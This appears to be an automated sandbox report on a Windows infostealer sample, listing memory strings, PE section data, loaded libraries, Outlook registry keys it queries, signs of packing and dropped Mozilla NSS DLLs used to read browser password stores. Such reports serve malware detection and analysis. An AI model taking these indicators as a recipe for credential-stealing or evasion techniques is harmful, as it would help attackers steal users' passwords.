Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2198443466.000000002F8CE000.00000004.00000020.00020000.00000000.sdmp, DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2198443466.000000002F8CE000.00000004.00000020.00020000.00000000.sdmp, DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6DB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6DB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6DB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C67F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3	0_2_00CB60C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892	0_2_00D0F892
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0A851	0_2_00D0A851
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D00804	0_2_00D00804
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C25994	0_2_00C25994
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFF969	0_2_00DFF969
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D05967	0_2_00D05967
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D022CB	0_2_00D022CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9028B	0_2_00D9028B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC2245	0_2_00BC2245
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDC4C4	0_2_00CDC4C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0DC91	0_2_00D0DC91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0740D	0_2_00D0740D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D03EE3	0_2_00D03EE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D08E77	0_2_00D08E77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C52620	0_2_00C52620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0C7DD	0_2_00D0C7DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6735A0	0_2_6C6735A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685440	0_2_6C685440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E545C	0_2_6C6E545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E542B	0_2_6C6E542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EAC00	0_2_6C6EAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5C10	0_2_6C6B5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2C10	0_2_6C6C2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4E0	0_2_6C67D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6CF0	0_2_6C6B6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6864C0	0_2_6C6864C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D4D0	0_2_6C69D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D34A0	0_2_6C6D34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC4A0	0_2_6C6DC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686C80	0_2_6C686C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68FD00	0_2_6C68FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A0512	0_2_6C6A0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69ED10	0_2_6C69ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D85F0	0_2_6C6D85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B0DD0	0_2_6C6B0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6E63	0_2_6C6E6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C670	0_2_6C67C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2E4E	0_2_6C6C2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694640	0_2_6C694640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699E50	0_2_6C699E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B3E50	0_2_6C6B3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D9E30	0_2_6C6D9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C5600	0_2_6C6C5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7E10	0_2_6C6B7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E76E3	0_2_6C6E76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67BEF0	0_2_6C67BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68FEF0	0_2_6C68FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D4EA0	0_2_6C6D4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DE680	0_2_6C6DE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695E90	0_2_6C695E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689F00	0_2_6C689F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7710	0_2_6C6B7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67DFE0	0_2_6C67DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A6FF0	0_2_6C6A6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C77A0	0_2_6C6C77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BF070	0_2_6C6BF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698850	0_2_6C698850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D850	0_2_6C69D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB820	0_2_6C6BB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C4820	0_2_6C6C4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687810	0_2_6C687810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69C0E0	0_2_6C69C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B58E0	0_2_6C6B58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E50C7	0_2_6C6E50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A60A0	0_2_6C6A60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D960	0_2_6C68D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB970	0_2_6C6CB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EB170	0_2_6C6EB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A940	0_2_6C69A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C9A0	0_2_6C67C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AD9B0	0_2_6C6AD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5190	0_2_6C6B5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D2990	0_2_6C6D2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9A60	0_2_6C6B9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C691AF0	0_2_6C691AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE2F0	0_2_6C6BE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B8AC0	0_2_6C6B8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6722A0	0_2_6C6722A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4AA0	0_2_6C6A4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68CAB0	0_2_6C68CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E2AB0	0_2_6C6E2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EBA90	0_2_6C6EBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68C370	0_2_6C68C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675340	0_2_6C675340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BD320	0_2_6C6BD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E53C8	0_2_6C6E53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F380	0_2_6C67F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6ACBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00954610 appears 316 times

Source: file.exe, 00000000.00000002.2290359355.000000006C8F5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: aeddekjg ZLIB complexity 0.995004394823459

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6D7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009690A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_009690A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\QP65R8JG.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2117407226.000000001D548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133622285.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133231439.000000001D53B000.00000004.00000020.00020000.00000000.sdmp, AAFBAKECAEGCBFIEGDGI.0.dr, EBGDHJECFCFCAKFHCFID.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2289660315.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1806848 > 1048576

Source: file.exe

Static PE information: Raw size of aeddekjg is bigger than: 0x100000 < 0x1a1c00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2290237091.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.950000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aeddekjg:EW;huvayiog:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aeddekjg:EW;huvayiog:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00969270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00969270

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c1207 should be: 0x1bf018

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: aeddekjg
Source: file.exe	Static PE information: section name: huvayiog
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3 push 2BE086EAh; mov dword ptr [esp], edx	0_2_00CB61DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3 push 1EE598B5h; mov dword ptr [esp], ebp	0_2_00CB62D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3 push ebp; mov dword ptr [esp], ecx	0_2_00CB62F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3 push eax; mov dword ptr [esp], esi	0_2_00CB6319
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB60C3 push eax; mov dword ptr [esp], edi	0_2_00CB6327
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8D8C0 push ecx; mov dword ptr [esp], ebp	0_2_00D8D8E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D950C6 push edx; mov dword ptr [esp], 3C385F20h	0_2_00D95100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7E8F1 push edi; mov dword ptr [esp], ebp	0_2_00D7EA13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE30F8 push ebx; mov dword ptr [esp], eax	0_2_00DE3122
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D218F5 push esi; mov dword ptr [esp], 1361529Dh	0_2_00D23C0E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ecx; mov dword ptr [esp], eax	0_2_00D0F93D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ebp; mov dword ptr [esp], ecx	0_2_00D0F95C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 3540E403h; mov dword ptr [esp], esi	0_2_00D0F9A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 7187D983h; mov dword ptr [esp], eax	0_2_00D0F9F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ecx; mov dword ptr [esp], edx	0_2_00D0FA2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ecx; mov dword ptr [esp], ebp	0_2_00D0FA9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ebx; mov dword ptr [esp], 748202B0h	0_2_00D0FAC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 0935C75Bh; mov dword ptr [esp], esi	0_2_00D0FAFF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push esi; mov dword ptr [esp], ecx	0_2_00D0FB85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 137F5001h; mov dword ptr [esp], eax	0_2_00D0FC4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 6676873Ah; mov dword ptr [esp], esi	0_2_00D0FC6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push eax; mov dword ptr [esp], 6E96FBBAh	0_2_00D0FDE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push edx; mov dword ptr [esp], 0431823Eh	0_2_00D0FDEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push eax; mov dword ptr [esp], 7D97DED0h	0_2_00D0FEA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ebp; mov dword ptr [esp], edi	0_2_00D0FF04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ecx; mov dword ptr [esp], edi	0_2_00D0FF19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 2CECE570h; mov dword ptr [esp], ebx	0_2_00D0FF21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push ecx; mov dword ptr [esp], 00000092h	0_2_00D0FF71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 008A9F58h; mov dword ptr [esp], eax	0_2_00D0FF8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 70A4DED0h; mov dword ptr [esp], ebp	0_2_00D0FF99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0F892 push 4212055Dh; mov dword ptr [esp], edi	0_2_00D1000C

Source: file.exe

Static PE information: section name: aeddekjg entropy: 7.953688410492085

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
